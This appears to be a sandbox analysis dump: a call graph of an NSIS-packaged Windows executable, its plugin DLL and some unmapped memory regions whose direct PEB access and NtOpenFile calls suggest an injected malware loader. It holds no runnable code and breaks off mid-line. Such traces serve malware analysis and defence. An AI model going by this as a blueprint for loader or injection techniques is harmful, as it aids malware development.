10856->10857 10858 405d29 10857->10858 10859 405d1d CharPrevW 10857->10859 10858->10770 10859->10857 10859->10858 10860->10780 10897 405eb9 GetFileAttributesW 10861->10897 10864 405ad5 DeleteFileW 10866 405adb 10864->10866 10865 405acd RemoveDirectoryW 10865->10866 10867 405adf 10866->10867 10868 405aeb SetFileAttributesW 10866->10868 10867->10780 10868->10867 10870 40546b 10869->10870 10879 40550d 10869->10879 10871 405487 lstrlenW 10870->10871 10872 40640a 17 API calls 10870->10872 10873 4054b0 10871->10873 10874 405495 lstrlenW 10871->10874 10872->10871 10876 4054c3 10873->10876 10877 4054b6 SetWindowTextW 10873->10877 10875 4054a7 lstrcatW 10874->10875 10874->10879 10875->10873 10878 4054c9 SendMessageW SendMessageW SendMessageW 10876->10878 10876->10879 10877->10876 10878->10879 10879->10780 10881 4061cf 10880->10881 10882 4061c2 10880->10882 10881->10780 10900 406034 10882->10900 10885 406741 FindClose 10884->10885 10886 405c7e 10884->10886 10885->10886 10886->10764 10886->10777 10888 405c88 10887->10888 10889 405cd9 lstrcatW 10887->10889 10888->10783 10889->10888 10890->10843 10892 405d85 10891->10892 10896 405d97 10891->10896 10893 405d92 CharNextW 10892->10893 10892->10896 10894 405dbb 10893->10894 10894->10846 10894->10847 10895 405cea CharNextW 10895->10896 10896->10894 10896->10895 10898 405abe 10897->10898 10899 405ecb SetFileAttributesW 10897->10899 10898->10864 10898->10865 10898->10867 10899->10898 10901 406064 10900->10901 10902 40608a GetShortPathNameW 10900->10902 10927 405ede GetFileAttributesW CreateFileW 10901->10927 10904 4061a9 10902->10904 10905 40609f 10902->10905 10904->10881 10905->10904 10907 4060a7 wsprintfA 10905->10907 10906 40606e CloseHandle GetShortPathNameW 10906->10904 10908 406082 10906->10908 10909 40640a 17 API calls 10907->10909 10908->10902 10908->10904 10910 4060cf 10909->10910 10928 405ede GetFileAttributesW CreateFileW 10910->10928 10912 4060dc 10912->10904 10913 4060eb GetFileSize GlobalAlloc 10912->10913 10914 4061a2 CloseHandle 10913->10914 10915 40610d 10913->10915 10914->10904 10929 405f61 ReadFile 10915->10929 10920 406140 10922 405e43 4 API calls 10920->10922 10921 40612c lstrcpyA 10923 40614e 10921->10923 10922->10923 10924 406185 SetFilePointer 10923->10924 10936 405f90 WriteFile 10924->10936 10927->10906 10928->10912 10930 405f7f 10929->10930 10930->10914 10931 405e43 lstrlenA 10930->10931 10932 405e84 lstrlenA 10931->10932 10933 405e8c 10932->10933 10934 405e5d lstrcmpiA 10932->10934 10933->10920 10933->10921 10934->10933 10935 405e7b CharNextA 10934->10935 10935->10932 10937 405fae GlobalFree 10936->10937 10937->10914 11152 401e49 11160 402c1f 11152->11160 11154 401e4f 11155 402c1f 17 API calls 11154->11155 11156 401e5b 11155->11156 11157 401e72 EnableWindow 11156->11157 11158 401e67 ShowWindow 11156->11158 11159 402ac5 11157->11159 11158->11159 11161 40640a 17 API calls 11160->11161 11162 402c34 11161->11162 11162->11154 11163 40264a 11164 402c1f 17 API calls 11163->11164 11165 402659 11164->11165 11166 4026a3 ReadFile 11165->11166 11167 405f61 ReadFile 11165->11167 11169 4026e3 MultiByteToWideChar 11165->11169 11170 402798 11165->11170 11171 40273c 11165->11171 11173 402709 SetFilePointer MultiByteToWideChar 11165->11173 11174 4027a9 11165->11174 11176 402796 11165->11176 11166->11165 11166->11176 11167->11165 11169->11165 11186 40632f wsprintfW 11170->11186 11171->11165 11171->11176 11177 405fbf SetFilePointer 11171->11177 11173->11165 11175 4027ca SetFilePointer 11174->11175 11174->11176 11175->11176 11178 405fdb 11177->11178 11179 405ff3 11177->11179 11180 405f61 ReadFile 11178->11180 11179->11171 11181 405fe7 11180->11181 11181->11179 11182 406024 SetFilePointer 11181->11182 11183 405ffc SetFilePointer 11181->11183 11182->11179 11183->11182 11184 406007 11183->11184 11185 405f90 WriteFile 11184->11185 11185->11179 11186->11176 12175 73d216d8 12176 73d21707 12175->12176 12177 73d21b63 22 API calls 12176->12177 12178 73d2170e 12177->12178 12179 73d21721 12178->12179 12180 73d21715 12178->12180 12182 73d2172b 12179->12182 12183 73d21748 12179->12183 12181 73d21272 2 API calls 12180->12181 12186 73d2171f 12181->12186 12187 73d2153d 3 API calls 12182->12187 12184 73d21772 12183->12184 12185 73d2174e 12183->12185 12189 73d2153d 3 API calls 12184->12189 12188 73d215b4 3 API calls 12185->12188 12190 73d21730 12187->12190 12192 73d21753 12188->12192 12189->12186 12191 73d215b4 3 API calls 12190->12191 12193 73d21736 12191->12193 12194 73d21272 2 API calls 12192->12194 12195 73d21272 2 API calls 12193->12195 12196 73d21759 GlobalFree 12194->12196 12197 73d2173c GlobalFree 12195->12197 12196->12186 12198 73d2176d GlobalFree 12196->12198 12197->12186 12198->12186 11226 40234e 11227 402c41 17 API calls 11226->11227 11228 40235d 11227->11228 11229 402c41 17 API calls 11228->11229 11230 402366 11229->11230 11231 402c41 17 API calls 11230->11231 11232 402370 GetPrivateProfileStringW 11231->11232 12560 73d218dd 12562 73d21900 12560->12562 12561 73d21947 12564 73d21272 2 API calls 12561->12564 12562->12561 12563 73d21935 GlobalFree 12562->12563 12563->12561 12565 73d21ad2 GlobalFree GlobalFree 12564->12565 11989 404850 11990 40487c 11989->11990 11991 40488d 11989->11991 12050 405a32 GetDlgItemTextW 11990->12050 11993 404899 GetDlgItem 11991->11993 11998 4048f8 11991->11998 11995 4048ad 11993->11995 11994 404887 11997 40667c 5 API calls 11994->11997 12000 4048c1 SetWindowTextW 11995->12000 12006 405d68 4 API calls 11995->12006 11996 4049dc 12001 404b8b 11996->12001 12052 405a32 GetDlgItemTextW 11996->12052 11997->11991 11998->11996 11998->12001 12002 40640a 17 API calls 11998->12002 12004 40435f 18 API calls 12000->12004 12005 4043c6 8 API calls 12001->12005 12007 40496c SHBrowseForFolderW 12002->12007 12003 404a0c 12008 405dc5 18 API calls 12003->12008 12009 4048dd 12004->12009 12010 404b9f 12005->12010 12011 4048b7 12006->12011 12007->11996 12012 404984 CoTaskMemFree 12007->12012 12013 404a12 12008->12013 12014 40435f 18 API calls 12009->12014 12011->12000 12017 405cbd 3 API calls 12011->12017 12015 405cbd 3 API calls 12012->12015 12053 4063e8 lstrcpynW 12013->12053 12016 4048eb 12014->12016 12018 404991 12015->12018 12051 404394 SendMessageW 12016->12051 12017->12000 12021 4049c8 SetDlgItemTextW 12018->12021 12026 40640a 17 API calls 12018->12026 12021->11996 12022 4048f1 12024 4067c2 5 API calls 12022->12024 12023 404a29 12025 4067c2 5 API calls 12023->12025 12024->11998 12033 404a30 12025->12033 12027 4049b0 lstrcmpiW 12026->12027 12027->12021 12030 4049c1 lstrcatW 12027->12030 12028 404a71 12054 4063e8 lstrcpynW 12028->12054 12030->12021 12031 404a78 12032 405d68 4 API calls 12031->12032 12034 404a7e GetDiskFreeSpaceW 12032->12034 12033->12028 12036 405d09 2 API calls 12033->12036 12038 404ac9 12033->12038 12037 404aa2 MulDiv 12034->12037 12034->12038 12036->12033 12037->12038 12039 404b3a 12038->12039 12055 404cd5 12038->12055 12041 404b5d 12039->12041 12043 40140b 2 API calls 12039->12043 12066 404381 KiUserCallbackDispatcher 12041->12066 12043->12041 12045 404b3c SetDlgItemTextW 12045->12039 12046 404b2c 12058 404c0c 12046->12058 12047 404b79 12047->12001 12067 4047a9 12047->12067 12050->11994 12051->12022 12052->12003 12053->12023 12054->12031 12056 404c0c 20 API calls 12055->12056 12057 404b27 12056->12057 12057->12045 12057->12046 12059 404c25 12058->12059 12060 40640a 17 API calls 12059->12060 12061 404c89 12060->12061 12062 40640a 17 API calls 12061->12062 12063 404c94 12062->12063 12064 40640a 17 API calls 12063->12064 12065 404caa lstrlenW wsprintfW SetDlgItemTextW 12064->12065 12065->12039 12066->12047 12068 4047b7 12067->12068 12069 4047bc SendMessageW 12067->12069 12068->12069 12069->12001 12566 401b53 12567 402c41 17 API calls 12566->12567 12568 401b5a 12567->12568 12569 402c1f 17 API calls 12568->12569 12570 401b63 wsprintfW 12569->12570 12571 402ac5 12570->12571 12199 401956 12200 402c41 17 API calls 12199->12200 12201 40195d lstrlenW 12200->12201 12202 402592 12201->12202 12572 401f58 12573 402c41 17 API calls 12572->12573 12574 401f5f 12573->12574 12575 40672b 2 API calls 12574->12575 12576 401f65 12575->12576 12578 401f76 12576->12578 12579 40632f wsprintfW 12576->12579 12579->12578 11322 402259 11323 402c41 17 API calls 11322->11323 11324 40225f 11323->11324 11325 402c41 17 API calls 11324->11325 11326 402268 11325->11326 11327 402c41 17 API calls 11326->11327 11328 402271 11327->11328 11329 40672b 2 API calls 11328->11329 11330 40227a 11329->11330 11331 40228b lstrlenW lstrlenW 11330->11331 11335 40227e 11330->11335 11333 405450 24 API calls 11331->11333 11332 405450 24 API calls 11336 402286 11332->11336 11334 4022c9 SHFileOperationW 11333->11334 11334->11335 11334->11336 11335->11332 11335->11336 11337 40175c 11338 402c41 17 API calls 11337->11338 11339 401763 11338->11339 11343 405f0d 11339->11343 11341 40176a 11342 405f0d 2 API calls 11341->11342 11342->11341 11344 405f1a GetTickCount GetTempFileNameW 11343->11344 11345 405f50 11344->11345 11346 405f54 11344->11346 11345->11344 11345->11346 11346->11341 12203 401d5d GetDlgItem GetClientRect 12204 402c41 17 API calls 12203->12204 12205 401d8f LoadImageW SendMessageW 12204->12205 12206 401dad DeleteObject 12205->12206 12207 402ac5 12205->12207 12206->12207 12208 401563 12209 402a6b 12208->12209 12212 40632f wsprintfW 12209->12212 12211 402a70 12212->12211 11659 402868 11660 402c41 17 API calls 11659->11660 11661 40286f FindFirstFileW 11660->11661 11662 402882 11661->11662 11663 402897 11661->11663 11667 40632f wsprintfW 11663->11667 11665 4028a0 11668 4063e8 lstrcpynW 11665->11668 11667->11665 11668->11662 12213 401968 12214 402c1f 17 API calls 12213->12214 12215 40196f 12214->12215 12216 402c1f 17 API calls 12215->12216 12217 40197c 12216->12217 12218 402c41 17 API calls 12217->12218 12219 401993 lstrlenW 12218->12219 12221 4019a4 12219->12221 12220 4019e5 12221->12220 12225 4063e8 lstrcpynW 12221->12225 12223 4019d5 12223->12220 12224 4019da lstrlenW 12223->12224 12224->12220 12225->12223 12453 40166a 12454 402c41 17 API calls 12453->12454 12455 401670 12454->12455 12456 40672b 2 API calls 12455->12456 12457 401676 12456->12457 11669 40176f 11670 402c41 17 API calls 11669->11670 11671 401776 11670->11671 11672 401796 11671->11672 11673 40179e 11671->11673 11708 4063e8 lstrcpynW 11672->11708 11709 4063e8 lstrcpynW 11673->11709 11676 40179c 11679 40667c 5 API calls 11676->11679 11677 4017a9 11678 405cbd 3 API calls 11677->11678 11680 4017af lstrcatW 11678->11680 11695 4017bb 11679->11695 11680->11676 11681 40672b 2 API calls 11681->11695 11682 405eb9 2 API calls 11682->11695 11684 4017cd CompareFileTime 11684->11695 11685 40188d 11686 405450 24 API calls 11685->11686 11688 401897 11686->11688 11687 401864 11689 405450 24 API calls 11687->11689 11705 401879 11687->11705 11690 4031d6 44 API calls 11688->11690 11689->11705 11691 4018aa 11690->11691 11692 4018be SetFileTime 11691->11692 11694 4018d0 CloseHandle 11691->11694 11692->11694 11693 40640a 17 API calls 11693->11695 11696 4018e1 11694->11696 11694->11705 11695->11681 11695->11682 11695->11684 11695->11685 11695->11687 11695->11693 11697 4063e8 lstrcpynW 11695->11697 11702 405a4e MessageBoxIndirectW 11695->11702 11707 405ede GetFileAttributesW CreateFileW 11695->11707 11698 4018e6 11696->11698 11699 4018f9 11696->11699 11697->11695 11700 40640a 17 API calls 11698->11700 11701 40640a 17 API calls 11699->11701 11703 4018ee lstrcatW 11700->11703 11704 401901 11701->11704 11702->11695 11703->11704 11704->11705 11706 405a4e MessageBoxIndirectW 11704->11706 11706->11705 11707->11695 11708->11676 11709->11677 12458 401a72 12459 402c1f 17 API calls 12458->12459 12460 401a7b 12459->12460 12461 402c1f 17 API calls 12460->12461 12462 401a20 12461->12462 11907 401573 11908 401583 ShowWindow 11907->11908 11909 40158c 11907->11909 11908->11909 11910 402ac5 11909->11910 11911 40159a ShowWindow 11909->11911 11911->11910 12580 73d210e1 12581 73d21111 12580->12581 12582 73d211d8 GlobalFree 12581->12582 12583 73d212ba 2 API calls 12581->12583 12584 73d211d3 12581->12584 12585 73d211f8 GlobalFree 12581->12585 12586 73d21272 2 API calls 12581->12586 12587 73d21164 GlobalAlloc 12581->12587 12588 73d212e1 lstrcpyW 12581->12588 12589 73d211c4 GlobalFree 12581->12589 12583->12581 12584->12582 12585->12581 12586->12589 12587->12581 12588->12581 12589->12581 12226 402576 12227 402c41 17 API calls 12226->12227 12228 40257d 12227->12228 12231 405ede GetFileAttributesW CreateFileW 12228->12231 12230 402589 12231->12230 11919 401b77 11920 401b84 11919->11920 11921 401bc8 11919->11921 11927 401c0d 11920->11927 11928 401b9b 11920->11928 11922 401bf2 GlobalAlloc 11921->11922 11923 401bcd 11921->11923 11924 40640a 17 API calls 11922->11924 11932 4022f7 11923->11932 11938 4063e8 lstrcpynW 11923->11938 11924->11927 11925 40640a 17 API calls 11929 4022f1 11925->11929 11927->11925 11927->11932 11939 4063e8 lstrcpynW 11928->11939 11929->11932 11933 405a4e MessageBoxIndirectW 11929->11933 11930 401bdf GlobalFree 11930->11932 11933->11932 11934 401baa 11940 4063e8 lstrcpynW 11934->11940 11936 401bb9 11941 4063e8 lstrcpynW 11936->11941 11938->11930 11939->11934 11940->11936 11941->11932 11953 34a6172 11954 34a624e 11953->11954 11954->11954 11955 34a64c8 NtOpenFile 11954->11955 11956 34843b3 11955->11956 11975 40167b 11976 402c41 17 API calls 11975->11976 11977 401682 11976->11977 11978 402c41 17 API calls 11977->11978 11979 40168b 11978->11979 11980 402c41 17 API calls 11979->11980 11981 401694 MoveFileW 11980->11981 11982 4016a7 11981->11982 11988 4016a0 11981->11988 11984 40672b 2 API calls 11982->11984 11985 402250 11982->11985 11983 401423 24 API calls 11983->11985 11986 4016b6 11984->11986 11986->11985 11987 4061ae 36 API calls 11986->11987 11987->11988 11988->11983 12463 401e7d 12464 402c41 17 API calls 12463->12464 12465 401e83 12464->12465 12466 402c41 17 API calls 12465->12466 12467 401e8c 12466->12467 12468 402c41 17 API calls 12467->12468 12469 401e95 12468->12469 12470 402c41 17 API calls 12469->12470 12471 401e9e 12470->12471 12472 401423 24 API calls 12471->12472 12473 401ea5 12472->12473 12480 405a14 ShellExecuteExW 12473->12480 12475 401ee7 12476 406873 5 API calls 12475->12476 12478 40288b 12475->12478 12477 401f01 CloseHandle 12476->12477 12477->12478 12480->12475 12070 401000 12071 401037 BeginPaint GetClientRect 12070->12071 12072 40100c DefWindowProcW 12070->12072 12074 4010f3 12071->12074 12075 401179 12072->12075 12076 401073 CreateBrushIndirect FillRect DeleteObject 12074->12076 12077 4010fc 12074->12077 12076->12074 12078 401102 CreateFontIndirectW 12077->12078 12079 401167 EndPaint 12077->12079 12078->12079 12080 401112 6 API calls 12078->12080 12079->12075 12080->12079 12232 401503 12233 40150b 12232->12233 12235 40151e 12232->12235 12234 402c1f 17 API calls 12233->12234 12234->12235 10998 402104 10999 402c41 17 API calls 10998->10999 11000 40210b 10999->11000 11001 402c41 17 API calls 11000->11001 11002 402115 11001->11002 11003 402c41 17 API calls 11002->11003 11004 40211f 11003->11004 11005 402c41 17 API calls 11004->11005 11006 402129 11005->11006 11007 402c41 17 API calls 11006->11007 11009 402133 11007->11009 11008 402172 CoCreateInstance 11013 402191 11008->11013 11009->11008 11010 402c41 17 API calls 11009->11010 11010->11008 11011 401423 24 API calls 11012 402250 11011->11012 11013->11011 11013->11012 11014 73d22997 11015 73d229e7 11014->11015 11016 73d229a7 VirtualProtect 11014->11016 11016->11015 11124 401f06 11125 402c41 17 API calls 11124->11125 11126 401f0c 11125->11126 11127 405450 24 API calls 11126->11127 11128 401f16 11127->11128 11139 4059d1 CreateProcessW 11128->11139 11131 40288b 11134 401f31 11135 401f41 11134->11135 11136 401f36 11134->11136 11138 401f3f CloseHandle 11135->11138 11147 40632f wsprintfW 11136->11147 11138->11131 11140 401f1c 11139->11140 11141 405a04 CloseHandle 11139->11141 11140->11131 11140->11138 11142 406873 WaitForSingleObject 11140->11142 11141->11140 11143 40688d 11142->11143 11144 40689f GetExitCodeProcess 11143->11144 11148 4067fe 11143->11148 11144->11134 11147->11138 11149 40681b PeekMessageW 11148->11149 11150 406811 DispatchMessageW 11149->11150 11151 40682b WaitForSingleObject 11149->11151 11150->11149 11151->11143 12081 404809 12082 404819 12081->12082 12083 40483f 12081->12083 12084 40435f 18 API calls 12082->12084 12085 4043c6 8 API calls 12083->12085 12086 404826 SetDlgItemTextW 12084->12086 12087 40484b 12085->12087 12086->12083 11190 40230c 11191 402314 11190->11191 11192 40231a 11190->11192 11193 402c41 17 API calls 11191->11193 11194 402328 11192->11194 11195 402c41 17 API calls 11192->11195 11193->11192 11196 402336 11194->11196 11197 402c41 17 API calls 11194->11197 11195->11194 11198 402c41 17 API calls 11196->11198 11197->11196 11199 40233f WritePrivateProfileStringW 11198->11199 12236 40190c 12237 401943 12236->12237 12238 402c41 17 API calls 12237->12238 12239 401948 12238->12239 12240 405afa 67 API calls 12239->12240 12241 401951 12240->12241 12242 40190f 12243 402c41 17 API calls 12242->12243 12244 401916 12243->12244 12245 405a4e MessageBoxIndirectW 12244->12245 12246 40191f 12245->12246 11316 405a14 ShellExecuteExW 12247 401d14 12248 402c1f 17 API calls 12247->12248 12249 401d1b 12248->12249 12250 402c1f 17 API calls 12249->12250 12251 401d27 GetDlgItem 12250->12251 12252 402592 12251->12252 12481 3487910 GetPEB 12482 34879be 12481->12482 12253 40451e 12254 404650 12253->12254 12255 404536 12253->12255 12256 4046ba 12254->12256 12259 404784 12254->12259 12262 40468b GetDlgItem SendMessageW 12254->12262 12258 40435f 18 API calls 12255->12258 12257 4046c4 GetDlgItem 12256->12257 12256->12259 12260 404745 12257->12260 12261 4046de 12257->12261 12263 40459d 12258->12263 12264 4043c6 8 API calls 12259->12264 12260->12259 12265 404757 12260->12265 12261->12260 12269 404704 SendMessageW LoadCursorW SetCursor 12261->12269 12286 404381 KiUserCallbackDispatcher 12262->12286 12267 40435f 18 API calls 12263->12267 12268 40477f 12264->12268 12270 40476d 12265->12270 12271 40475d SendMessageW 12265->12271 12273 4045aa CheckDlgButton 12267->12273 12287 4047cd 12269->12287 12270->12268 12276 404773 SendMessageW 12270->12276 12271->12270 12272 4046b5 12277 4047a9 SendMessageW 12272->12277 12284 404381 KiUserCallbackDispatcher 12273->12284 12276->12268 12277->12256 12279 4045c8 GetDlgItem 12285 404394 SendMessageW 12279->12285 12281 4045de SendMessageW 12282 404604 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 12281->12282 12283 4045fb GetSysColor 12281->12283 12282->12268 12283->12282 12284->12279 12285->12281 12286->12272 12290 405a14 ShellExecuteExW 12287->12290 12289 404733 LoadCursorW SetCursor 12289->12260 12290->12289 12088 401c1f 12089 402c1f 17 API calls 12088->12089 12090 401c26 12089->12090 12091 402c1f 17 API calls 12090->12091 12092 401c33 12091->12092 12093 401c48 12092->12093 12094 402c41 17 API calls 12092->12094 12095 401c58 12093->12095 12098 402c41 17 API calls 12093->12098 12094->12093 12096 401c63 12095->12096 12097 401caf 12095->12097 12099 402c1f 17 API calls 12096->12099 12100 402c41 17 API calls 12097->12100 12098->12095 12101 401c68 12099->12101 12102 401cb4 12100->12102 12103 402c1f 17 API calls 12101->12103 12104 402c41 17 API calls 12102->12104 12105 401c74 12103->12105 12106 401cbd FindWindowExW 12104->12106 12107 401c81 SendMessageTimeoutW 12105->12107 12108 401c9f SendMessageW 12105->12108 12109 401cdf 12106->12109 12107->12109 12108->12109 12110 402821 12111 402827 12110->12111 12112 40282f FindClose 12111->12112 12113 402ac5 12111->12113 12112->12113 12483 34a1d2b 12486 34a206e GetPEB 12483->12486 12485 34a1d30 12486->12485 12487 401a30 12488 402c41 17 API calls 12487->12488 12489 401a39 ExpandEnvironmentStringsW 12488->12489 12490 401a4d 12489->12490 12492 401a60 12489->12492 12491 401a52 lstrcmpW 12490->12491 12490->12492 12491->12492 11719 402032 11720 402044 11719->11720 11721 4020f6 11719->11721 11722 402c41 17 API calls 11720->11722 11723 401423 24 API calls 11721->11723 11724 40204b 11722->11724 11730 402250 11723->11730 11725 402c41 17 API calls 11724->11725 11726 402054 11725->11726 11727 40206a LoadLibraryExW 11726->11727 11728 40205c GetModuleHandleW 11726->11728 11727->11721 11729 40207b 11727->11729 11728->11727 11728->11729 11742 406831 WideCharToMultiByte 11729->11742 11733 4020c5 11737 405450 24 API calls 11733->11737 11734 40208c 11735 402094 11734->11735 11736 4020ab 11734->11736 11738 401423 24 API calls 11735->11738 11745 73d2177b 11736->11745 11739 40209c 11737->11739 11738->11739 11739->11730 11740 4020e8 FreeLibrary 11739->11740 11740->11730 11743 40685b GetProcAddress 11742->11743 11744 402086 11742->11744 11743->11744 11744->11733 11744->11734 11746 73d217ae 11745->11746 11787 73d21b63 11746->11787 11748 73d217b5 11749 73d218da 11748->11749 11750 73d217c6 11748->11750 11751 73d217cd 11748->11751 11749->11739 11837 73d22356 11750->11837 11821 73d22398 11751->11821 11756 73d21813 11850 73d2256d 11756->11850 11757 73d21831 11760 73d21882 11757->11760 11761 73d21837 11757->11761 11758 73d217e3 11763 73d217e9 11758->11763 11768 73d217f4 11758->11768 11759 73d217fc 11770 73d217f2 11759->11770 11847 73d22d2f 11759->11847 11766 73d2256d 10 API calls 11760->11766 11869 73d215c6 11761->11869 11763->11770 11831 73d22a74 11763->11831 11773 73d21873 11766->11773 11767 73d21819 11861 73d215b4 11767->11861 11841 73d22728 11768->11841 11770->11756 11770->11757 11778 73d218c9 11773->11778 11876 73d22530 11773->11876 11775 73d217fa 11775->11770 11776 73d2256d 10 API calls 11776->11773 11778->11749 11781 73d218d3 GlobalFree 11778->11781 11781->11749 11784 73d218b5 11784->11778 11880 73d2153d wsprintfW 11784->11880 11785 73d218ae FreeLibrary 11785->11784 11883 73d2121b GlobalAlloc 11787->11883 11789 73d21b87 11884 73d2121b GlobalAlloc 11789->11884 11791 73d21dad GlobalFree GlobalFree GlobalFree 11792 73d21dca 11791->11792 11808 73d21e14 11791->11808 11794 73d22196 11792->11794 11800 73d21ddf 11792->11800 11792->11808 11793 73d21c68 GlobalAlloc 11812 73d21b92 11793->11812 11795 73d221b8 GetModuleHandleW 11794->11795 11794->11808 11796 73d221c9 LoadLibraryW 11795->11796 11797 73d221de 11795->11797 11796->11797 11796->11808 11891 73d21621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 11797->11891 11798 73d21cb3 lstrcpyW 11802 73d21cbd lstrcpyW 11798->11802 11799 73d21cd1 GlobalFree 11799->11812 11800->11808 11887 73d2122c 11800->11887 11802->11812 11803 73d22230 11806 73d2223d lstrlenW 11803->11806 11803->11808 11804 73d220f0 11804->11808 11815 73d22138 lstrcpyW 11804->11815 11892 73d21621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 11806->11892 11807 73d22068 11890 73d2121b GlobalAlloc 11807->11890 11808->11748 11809 73d221f0 11809->11803 11819 73d2221a GetProcAddress 11809->11819 11812->11791 11812->11793 11812->11798 11812->11799 11812->11802 11812->11804 11812->11807 11812->11808 11813 73d21d0f 11812->11813 11814 73d21fa9 GlobalFree 11812->11814 11817 73d2122c 2 API calls 11812->11817 11813->11812 11885 73d2158f GlobalSize GlobalAlloc 11813->11885 11814->11812 11815->11808 11816 73d22257 11816->11808 11817->11812 11819->11803 11820 73d22071 11820->11748 11823 73d223b0 11821->11823 11822 73d2122c GlobalAlloc lstrcpynW 11822->11823 11823->11822 11825 73d224d9 GlobalFree 11823->11825 11826 73d22483 GlobalAlloc CLSIDFromString 11823->11826 11827 73d22458 GlobalAlloc WideCharToMultiByte 11823->11827 11830 73d224a2 11823->11830 11894 73d212ba 11823->11894 11825->11823 11828 73d217d3 11825->11828 11826->11825 11827->11825 11828->11758 11828->11759 11828->11770 11830->11825 11898 73d226bc 11830->11898 11833 73d22a86 11831->11833 11832 73d22b2b EnumWindows 11834 73d22b49 11832->11834 11833->11832 11835 73d22c45 11834->11835 11836 73d22c3a GetLastError 11834->11836 11835->11770 11836->11835 11838 73d2236b 11837->11838 11839 73d217cc 11838->11839 11840 73d22376 GlobalAlloc 11838->11840 11839->11751 11840->11838 11845 73d22758 11841->11845 11842 73d227f3 GlobalAlloc 11846 73d22816 11842->11846 11843 73d22806 11844 73d2280c GlobalSize 11843->11844 11843->11846 11844->11846 11845->11842 11845->11843 11846->11775 11848 73d22d3a 11847->11848 11849 73d22d7a GlobalFree 11848->11849 11901 73d2121b GlobalAlloc 11850->11901 11852 73d22612 StringFromGUID2 11855 73d22577 11852->11855 11853 73d22623 lstrcpynW 11853->11855 11854 73d225f0 MultiByteToWideChar 11854->11855 11855->11852 11855->11853 11855->11854 11856 73d22636 wsprintfW 11855->11856 11857 73d2265a GlobalFree 11855->11857 11858 73d2268f GlobalFree 11855->11858 11859 73d21272 2 API calls 11855->11859 11902 73d212e1 11855->11902 11856->11855 11857->11855 11858->11767 11859->11855 11906 73d2121b GlobalAlloc 11861->11906 11863 73d215b9 11864 73d215c6 2 API calls 11863->11864 11865 73d215c3 11864->11865 11866 73d21272 11865->11866 11867 73d212b5 GlobalFree 11866->11867 11868 73d2127b GlobalAlloc lstrcpynW 11866->11868 11867->11773 11868->11867 11870 73d215d6 lstrcpyW 11869->11870 11871 73d215e4 11869->11871 11874 73d2161d 11870->11874 11871->11870 11873 73d215f0 11871->11873 11873->11874 11875 73d2160d wsprintfW 11873->11875 11874->11776 11875->11874 11877 73d2253e 11876->11877 11879 73d21895 11876->11879 11878 73d2255a GlobalFree 11877->11878 11877->11879 11878->11877 11879->11784 11879->11785 11881 73d21272 2 API calls 11880->11881 11882 73d2155e 11881->11882 11882->11778 11883->11789 11884->11812 11886 73d215ad 11885->11886 11886->11813 11893 73d2121b GlobalAlloc 11887->11893 11889 73d2123b lstrcpynW 11889->11808 11890->11820 11891->11809 11892->11816 11893->11889 11895 73d212c1 11894->11895 11896 73d2122c 2 API calls 11895->11896 11897 73d212df 11896->11897 11897->11823 11899 73d22720 11898->11899 11900 73d226ca VirtualAlloc 11898->11900 11899->11830 11900->11899 11901->11855 11903 73d212ea 11902->11903 11904 73d2130c 11902->11904 11903->11904 11905 73d212f0 lstrcpyW 11903->11905 11904->11855 11905->11904 11906->11863 11912 401735 11913 402c41 17 API calls 11912->11913 11914 40173c SearchPathW 11913->11914 11915 4029e6 11914->11915 11916 401757 11914->11916 11916->11915 11918 4063e8 lstrcpynW 11916->11918 11918->11915 12493 402a35 12494 402c1f 17 API calls 12493->12494 12495 402a3b 12494->12495 12496 402a72 12495->12496 12497 40288b 12495->12497 12499 402a4d 12495->12499 12496->12497 12498 40640a 17 API calls 12496->12498 12498->12497 12499->12497 12501 40632f wsprintfW 12499->12501 12501->12497 12114 40283b 12115 402843 12114->12115 12116 402847 FindNextFileW 12115->12116 12117 402859 12115->12117 12116->12117 12119 4029e6 12117->12119 12120 4063e8 lstrcpynW 12117->12120 12120->12119 10938 4015c1 10939 402c41 17 API calls 10938->10939 10940 4015c8 10939->10940 10941 405d68 4 API calls 10940->10941 10942 4015d1 10941->10942 10943 401631 10942->10943 10944 405cea CharNextW 10942->10944 10954 401617 GetFileAttributesW 10942->10954 10957 4059b9 10942->10957 10960 40591f CreateDirectoryW 10942->10960 10969 40599c CreateDirectoryW 10942->10969 10945 401663 10943->10945 10946 401636 10943->10946 10944->10942 10948 401423 24 API calls 10945->10948 10965 401423 10946->10965 10955 40165b 10948->10955 10953 40164a SetCurrentDirectoryW 10953->10955 10954->10942 10972 4067c2 GetModuleHandleA 10957->10972 10961 405970 GetLastError 10960->10961 10962 40596c 10960->10962 10961->10962 10963 40597f SetFileSecurityW 10961->10963 10962->10942 10963->10962 10964 405995 GetLastError 10963->10964 10964->10962 10966 405450 24 API calls 10965->10966 10967 401431 10966->10967 10968 4063e8 lstrcpynW 10967->10968 10968->10953 10970 4059b0 GetLastError 10969->10970 10971 4059ac 10969->10971 10970->10971 10971->10942 10973 4067e8 GetProcAddress 10972->10973 10974 4067de 10972->10974 10976 4059c0 10973->10976 10978 406752 GetSystemDirectoryW 10974->10978 10976->10942 10977 4067e4 10977->10973 10977->10976 10979 406774 wsprintfW LoadLibraryExW 10978->10979 10979->10977 12597 4053c4 12598 4053d4 12597->12598 12599 4053e8 12597->12599 12601 405431 12598->12601 12602 4053da 12598->12602 12600 4053f0 IsWindowVisible 12599->12600 12608 405407 12599->12608 12600->12601 12604 4053fd 12600->12604 12605 405436 CallWindowProcW 12601->12605 12603 4043ab SendMessageW 12602->12603 12606 4053e4 12603->12606 12607 404d1a 5 API calls 12604->12607 12605->12606 12607->12608 12608->12605 12609 404d9a 4 API calls 12608->12609 12609->12601 12610 73d21058 12612 73d21074 12610->12612 12611 73d210dd 12612->12611 12613 73d21092 12612->12613 12614 73d21516 GlobalFree 12612->12614 12615 73d21516 GlobalFree 12613->12615 12614->12613 12616 73d210a2 12615->12616 12617 73d210b2 12616->12617 12618 73d210a9 GlobalSize 12616->12618 12619 73d210b6 GlobalAlloc 12617->12619 12620 73d210c7 12617->12620 12618->12617 12621 73d2153d 3 API calls 12619->12621 12622 73d210d2 GlobalFree 12620->12622 12621->12620 12622->12611 11187 4014cb 11188 405450 24 API calls 11187->11188 11189 4014d2 11188->11189 12298 404dcc GetDlgItem GetDlgItem 12299 404e1e 7 API calls 12298->12299 12306 405037 12298->12306 12300 404ec1 DeleteObject 12299->12300 12301 404eb4 SendMessageW 12299->12301 12302 404eca 12300->12302 12301->12300 12304 404f01 12302->12304 12305 